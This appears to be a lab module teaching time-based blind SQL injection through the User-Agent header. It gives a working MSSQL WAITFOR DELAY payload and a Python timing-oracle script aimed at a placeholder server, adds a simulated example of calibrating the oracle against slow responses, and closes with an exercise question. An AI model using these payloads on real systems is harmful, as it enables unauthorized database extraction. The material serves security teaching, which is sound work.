Blind SQL Injection
Oracle Design
Theory
In this case, neither results nor SQL error messages from the injection in the User-Agent header are displayed. All we know is that the query runs synchronously, because the rest of the page waits for it to complete before being returned to us. To extract data in this situation, we can make the server evaluate queries and then wait for different amounts of time depending on the outcome. For example, imagine we want to know whether the query q is true or false. We can set the User-Agent so that a query similar to the following is executed: if q is true, the server waits 5 seconds before responding, and if q is false it responds immediately.
SELECT ... FROM ... WHERE ... = 'Mozilla Firefox...'; IF (q) WAITFOR DELAY '0:0:5'--'
For example, let's once again test the 1=0 and 1=1 queries. First, testing a False query (e.g. 1=0) does not result in any delay, and we get an instant response, as shown below:

Now, if we test a query that results in True (e.g. 1=1), we get a response delayed by the time we specified, as shown below:

We can use the same concept with any SQL query to verify whether it is true or false.
Practice
In Python, we can script this as follows. As this injection is time-based, you may have to experiment with the value of DELAY. In the script below we used 1 second, but you may need more depending on internet/VPN speed. With time-based injections, the longer the delay, the more accurate your results will be: if you used a delay of 1 second and the server simply responded slowly to one request, you might conclude that the injection caused the delay rather than the server just being slow. Of course, a longer delay means the dumping process takes longer, so this is a trade-off you need to consider.
#!/usr/bin/python3
import requests
import time

# Define the length of time (in seconds) the server should
# wait if `q` is `true`
DELAY = 1

# Evaluates `q` on the server side and returns `true` or `false`
def oracle(q):
    start = time.time()
    r = requests.get(
        "http://SERVER_IP:8080/",
        headers={"User-Agent": f"';IF({q}) WAITFOR DELAY '0:0:{DELAY}'--"}
    )
    return time.time() - start > DELAY

# Verify that the oracle works by checking if the correct
# values are returned for queries `1=1` and `1=0`
assert oracle("1=1")
assert not oracle("1=0")
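The delay trade-off discussed above, as an added example that is not part of the module: a self-contained Python simulation with no network access, in which the vulnerable endpoint is a constructed stand-in function. It shows how one slow response can fool a single-request timing oracle, and how measuring a baseline on a known-false condition and taking a majority vote over repeated requests makes the verdict robust. The names `simulated_server`, `build_sender`, `calibrate`, `naive_oracle` and `voting_oracle`, and the jitter values, are assumptions of this example.

```python
import statistics
import time

# Seconds the (simulated) server sleeps when the injected condition is true.
# Kept small so the simulation finishes quickly; the module's script uses 1.
DELAY = 0.2


def simulated_server(q_is_true, jitter=0.0):
    """Constructed stand-in for the vulnerable endpoint.

    The real target runs `IF (q) WAITFOR DELAY ...` from the User-Agent header;
    here the outcome of q is passed in directly, plus a per-request `jitter`
    that models a slow network link or a busy server.
    """
    time.sleep((DELAY if q_is_true else 0.0) + jitter)


def build_sender(q_is_true, jitters):
    """Zero-argument callable that replays the constructed `jitters`, one per request."""
    remaining = iter(jitters)
    return lambda: simulated_server(q_is_true, next(remaining, 0.0))


def measure(send):
    """Round-trip time of one request, in seconds."""
    start = time.monotonic()
    send()
    return time.monotonic() - start


def calibrate(send_false, samples=5):
    """Median response time for a condition known to be false (e.g. 1=0): the baseline."""
    return statistics.median(measure(send_false) for _ in range(samples))


def naive_oracle(send_q, baseline):
    """One request: true if it took noticeably longer than the baseline."""
    return measure(send_q) > baseline + DELAY / 2


def voting_oracle(send_q, baseline, votes=3):
    """Repeat the request an odd number of times and take the majority verdict."""
    threshold = baseline + DELAY / 2
    hits = sum(measure(send_q) > threshold for _ in range(votes))
    return hits > votes // 2


def demo():
    baseline = calibrate(build_sender(False, [0.01] * 5))
    # A single slow response on a false condition fools the one-shot oracle...
    spike = DELAY + 0.05
    naive_verdict = naive_oracle(build_sender(False, [spike]), baseline)
    # ...but is outvoted by two normal responses.
    voted_verdict = voting_oracle(build_sender(False, [spike, 0.01, 0.01]), baseline)
    # A genuinely true condition is still recognised.
    true_verdict = voting_oracle(build_sender(True, [0.01, 0.01, 0.01]), baseline)
    return naive_verdict, voted_verdict, true_verdict


if __name__ == "__main__":
    print(demo())  # (True, False, True): naive oracle fooled, voting oracle correct
```

Voting multiplies the number of requests by the vote count, which is the same cost-versus-accuracy trade-off the text describes for a longer DELAY; calibrating against a known-false condition also keeps the threshold meaningful when the baseline response time is itself large.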
Question
Use the oracle to figure out what the fifth letter of db_name() is (Hint: it is a lowercase letter). You can use the following query as a base:
(select substring(db_name(), 5, 1)) = 'a'